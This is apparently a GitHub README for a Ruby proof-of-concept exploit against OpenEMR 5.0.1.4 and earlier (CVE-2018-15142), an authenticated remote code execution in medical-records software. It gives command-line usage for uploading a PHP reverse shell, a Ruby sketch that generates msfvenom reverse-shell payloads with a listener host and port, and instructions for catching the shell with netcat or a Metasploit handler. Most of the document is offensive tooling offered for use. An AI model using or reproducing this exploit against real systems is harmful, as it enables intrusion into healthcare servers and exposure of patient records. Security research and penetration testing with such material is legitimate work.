https://github.com/noraj/openemr-rce

# OpenEMR RCE exploit / PoC

> OpenEMR <= 5.0.1.4 - (Authenticated) Remote Code Execution

Exploit for [CVE-2018-15142](https://nvd.nist.gov/vuln/detail/CVE-2018-15142).

[[EDB-49486](https://www.exploit-db.com/exploits/49486)] [[PacketStorm](https://packetstormsecurity.com/files/158711/OpenEMR-5.0.1-Remote-Code-Execution.html)] [[WLB-2020080011](https://cxsecurity.com/issue/WLB-2020080011)]

## Usage

```
$ ruby exploit.rb --help
OpenEMR <= 5.0.1.4 - (Authenticated) Remote Code Execution

Usage:
exploit.rb manual --root-url --shell --user --password [--debug]
exploit.rb semi-auto --root-url --user --password --payload --lhost --lport [--debug]
exploit.rb auto --root-url --user --password --lhost --lport [--debug]
exploit.rb -H | --help

Options:
-r , --root-url Root URL (base path) including HTTP scheme, port and root folder
-s , --shell Filename of the PHP reverse shell payload
-u , --user Username of the admin
-p , --password Password of the admin
-m , --payload Metasploit PHP payload
-h , --lhost Reverse shell local host
-t , --lport Reverse shell local port
--debug Display arguments
-H, --help Show this screen

Examples:
exploit.rb manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
exploit.rb semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
exploit.rb auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999
```

## Modes

- **Auto**: you know the target and have your listener ready, let the exploit handle the rest
- **Semi-auto**: same as auto, but you specify a payload other than the default `php/reverse_php`
- **Manual**: you already have a custom PHP reverse shell, the exploit lets you specify it
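The three modes differ only in where the PHP payload comes from. The Ruby sketch below is added here as an illustration of that dispatch and is not code from noraj/openemr-rce: manual reads the file given with `--shell`, semi-auto and auto shell out to `msfvenom` (auto with the default `php/reverse_php`), and every path is checked for a `<?php` tag before anything would be uploaded. The helper names `msfvenom_argv`, `run_msfvenom`, `php_payload?` and `build_payload`, and the `runner:` injection point, are assumptions of this example.

```ruby
require 'open3'

# Default Metasploit payload used by auto mode (semi-auto lets you override it).
DEFAULT_PAYLOAD = 'php/reverse_php'

# Argument vector for generating a raw PHP reverse shell with msfvenom.
# The port is validated so a typo does not become a silent bad LPORT= value.
def msfvenom_argv(lhost, lport, payload = DEFAULT_PAYLOAD)
  port = Integer(lport)
  raise ArgumentError, "invalid LPORT #{lport.inspect}" unless (1..65_535).cover?(port)
  ['msfvenom', '-p', payload, "LHOST=#{lhost}", "LPORT=#{port}", '-f', 'raw']
end

# Run msfvenom and return its stdout (the PHP source). Hypothetical helper.
def run_msfvenom(argv)
  out, err, status = Open3.capture3(*argv)
  raise "msfvenom failed: #{err.strip}" unless status.success?
  out
end

# msfvenom's PHP payloads open with a "<?php" tag; refuse to upload anything
# that does not look like PHP (an empty file, or an msfvenom error banner).
def php_payload?(src)
  !src.nil? && src.include?('<?php')
end

# Return the PHP source the exploit would upload for a given mode.
# opts mirrors the CLI options on this page: :shell, :payload, :lhost, :lport.
# runner lets a test swap the real msfvenom call for a stub.
def build_payload(mode, opts, runner: method(:run_msfvenom))
  src = case mode
        when 'manual'
          File.read(opts.fetch(:shell))
        when 'semi-auto'
          runner.call(msfvenom_argv(opts.fetch(:lhost), opts.fetch(:lport), opts.fetch(:payload)))
        when 'auto'
          runner.call(msfvenom_argv(opts.fetch(:lhost), opts.fetch(:lport)))
        else
          raise ArgumentError, "unknown mode #{mode.inspect}"
        end
  raise 'payload does not look like PHP, refusing to upload' unless php_payload?(src)
  src
end

if $PROGRAM_NAME == __FILE__
  # Same values as the page's auto-mode example, printed without running msfvenom.
  puts msfvenom_argv('192.168.0.2', 9999).join(' ')
end
```

With the default `php/reverse_php` a plain `nc -lvnp <lport>` listener on the `--lhost` side is enough. If you pass a staged payload such as `php/meterpreter/reverse_tcp` in semi-auto mode, start a matching `exploit/multi/handler` in `msfconsole` before running the exploit instead; a raw netcat listener will not complete the stage.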

## Requirements

- [httpclient](https://github.com/nahi/httpclient)
- [docopt.rb](https://github.com/docopt/docopt.rb)
- (Optional) [Metasploit Framework](https://github.com/rapid7/metasploit-framework) (`msfvenom` for reverse shell generation in auto and semi-auto modes)

Example for BlackArch:

```
pacman -S ruby-httpclient ruby-docopt metasploit
```

Example using gem:

```
gem install httpclient docopt
```

## Reference

This is a better re-write of [EDB-ID-48515][EDB-ID-48515] and implementation of [EDB-ID-45202 part 2][EDB-ID-45202]:

- using arguments (instead of hardcoded values)
- allowing a custom PHP reverse shell or auto-generating one with `msfvenom`
- cleaner and more customizable
- written in Ruby (Python 2 is deprecated)

This exploit was tested with Ruby 2.7.1.

About [EDB-ID-48515][EDB-ID-48515]:

```
Exploit Author: Musyoka Ian
Date: 2020-05-25
Vendor Homepage: https://www.open-emr.org/
Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile
Version: < 5.0.1 (Patch 4)
Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69
```

[EDB-ID-48515]:https://www.exploit-db.com/exploits/48515
[EDB-ID-45202]:https://www.exploit-db.com/exploits/45202